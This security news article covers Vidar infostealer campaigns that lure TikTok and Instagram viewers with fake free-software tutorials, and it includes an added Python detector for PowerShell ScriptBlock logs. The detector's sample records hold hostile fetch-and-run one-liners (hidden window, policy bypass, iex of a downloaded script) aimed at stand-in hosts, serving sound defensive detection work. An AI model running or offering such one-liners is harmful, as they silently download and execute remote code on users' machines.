Threat actors have been using short-form videos on TikTok and Instagram Reels to push the Vidar infostealer, disguising the attacks as tutorials for unlocking premium software for free.
New analysis from ReversingLabs describes two campaigns that game the platforms' recommendation algorithms to reach large audiences, both funneling viewers to sites peddling fake free software such as Spotify Premium.
Vidar is a long-running infostealer sold as a service for a $300 lifetime license, harvesting credentials, financial data and authentication tokens. A refresh last October made it stealthier.
The clips racked up real traction, with one tutorial drawing more than 100,000 views.
The first campaign ran through near-identical accounts with names like "windows.tips" and a blue-and-white crown icon that aped the official Windows profile. An AI-voiced clip walked viewers through opening PowerShell and pasting a command.
That PowerShell command silently downloaded and ran a script from a lookalike domain, msget[.]run, that some mistook for a Microsoft address. The file it pulled down is Vidar.
To climb the algorithm, the accounts chased saves and shares, the interactions platforms weigh most heavily, rather than likes. One video logged nearly 1,700 saves alongside its six-figure view count.
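The first campaign's lure is a single pasted PowerShell one-liner that fetches a script and runs it, which is exactly the shape that PowerShell ScriptBlock logging (Event ID 4104) records on an endpoint. The detector below is an added example written for this article, not code from ReversingLabs or from the campaign; the log records, user names and hosts are constructed, and the allowlist of expected download hosts is a hypothetical one an organisation would fill in itself. It flags a block that downloads and executes in one step, a download from a host outside the allowlist, and the hidden-window or policy-bypass flags that make the command "silent".

```python
import re
from dataclasses import dataclass, field

# Network-fetch cmdlets, aliases and .NET calls commonly seen in pasted one-liners.
DOWNLOAD_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|curl|wget|Invoke-RestMethod|irm|Start-BitsTransfer)\b"
    r"|\.Download(String|File|Data)\(",
    re.IGNORECASE,
)
# Ways the fetched content gets executed in the same block.
EXEC_RE = re.compile(
    r"\b(Invoke-Expression|iex|Start-Process)\b|\.Invoke\(|-(enc|encodedcommand)\b",
    re.IGNORECASE,
)
# Flags that hide the window or disable script policy: the "silent" part of the lure.
EVASION_RE = re.compile(
    r"-(w|windowstyle)\s+hidden\b|-(ep|executionpolicy)\s+bypass\b", re.IGNORECASE
)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Hypothetical allowlist of hosts this organisation's scripts legitimately fetch from.
ALLOWED_HOSTS = {"packages.example.corp", "update.example.corp"}


@dataclass
class Finding:
    record_id: int
    user: str
    severity: str
    reasons: list = field(default_factory=list)
    hosts: list = field(default_factory=list)


def analyze_record(rec):
    """Return a Finding for one 4104-style record, or None if nothing stands out."""
    block = rec["script_block"]
    hosts = [h.lower() for h in URL_RE.findall(block)]
    has_download = DOWNLOAD_RE.search(block) is not None
    has_exec = EXEC_RE.search(block) is not None
    reasons = []
    if has_download and has_exec:
        reasons.append("download and execute in one script block")
    unknown = [h for h in hosts if h not in ALLOWED_HOSTS]
    if has_download and unknown:
        reasons.append("fetches from host outside allowlist: " + ", ".join(unknown))
    if EVASION_RE.search(block):
        reasons.append("hidden window / execution-policy bypass flags")
    if not reasons:
        return None
    # Fetch-and-run in one block is the pasted-lure pattern; a bare fetch from an
    # unexpected host is worth a look but is often just an unregistered tool.
    severity = "high" if has_download and has_exec else "medium"
    return Finding(rec["record_id"], rec["user"], severity, reasons, hosts)


def triage(records):
    """Run the detector over a batch of records; returns findings in record order."""
    return [f for f in (analyze_record(r) for r in records) if f is not None]


# Constructed sample records in the shape of parsed PowerShell ScriptBlock logging
# (Event ID 4104) entries; the users, hosts and commands are made up for this example.
SAMPLE_RECORDS = [
    {"record_id": 1, "user": "CORP\\alice",
     "script_block": r"Get-ChildItem C:\Users\alice\Documents | Measure-Object"},
    {"record_id": 2, "user": "CORP\\svc-deploy",
     "script_block": r"Invoke-WebRequest -Uri https://packages.example.corp/agent.zip -OutFile C:\Temp\agent.zip"},
    {"record_id": 3, "user": "CORP\\bob",
     "script_block": 'powershell -w hidden -ep bypass -c "iex (iwr https://updates-lookalike.example.invalid/setup)"'},
    {"record_id": 4, "user": "CORP\\carol",
     "script_block": "$c = New-Object Net.WebClient; $c.DownloadString('http://freeware-gate.example.invalid/run') | iex"},
    {"record_id": 5, "user": "CORP\\dave",
     "script_block": "Invoke-RestMethod https://api.example.invalid/status"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"record {f.record_id} user={f.user} severity={f.severity}")
        for reason in f.reasons:
            print("   -", reason)
```

Run as-is, records 3 and 4 come out as high (fetch and run in one block, from hosts nobody allowlisted) and record 5 as medium (a fetch from an unknown host with no execution), while the benign listing and the deployment account's download from an allowlisted host produce nothing. The allowlist is what keeps this from paging on every `Invoke-WebRequest`; it has to be maintained from the organisation's own software-distribution inventory, which is the same inventory the audit recommendation later in the article calls for.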
Curiosity Bait in the Comments
The second campaign looked less polished, ReversingLabs said. Ordinary-looking accounts posted music-backed clips flaunting free Spotify Premium, then baited the comments, sometimes asking viewers to reply with a word like "ok" to trigger a direct message with instructions.
Those instructions pointed to sites such as d4ug[.]site that promised free games and AI tools but gated the download behind survey after survey. ReversingLabs could not get past them, so the final payload here stayed unconfirmed.
The approach is sticky, and like any social engineering, it is hard to police: creators can delete comments that warn others, and the firm's attempts to report the posts to Instagram were rejected.
To defend against this threat, ReversingLabs urged organizations to:
- Audit who holds software-install privileges and what they are installing
- Refresh phishing training to cover social feeds, not just email and text
- Encourage staff to report suspicious posts, even on personal accounts
"The more reports, the more likely it is that the accounts are taken down, which does slow down the momentum of these attackers," the company wrote. "Remaining diligent can help everyone be safer."
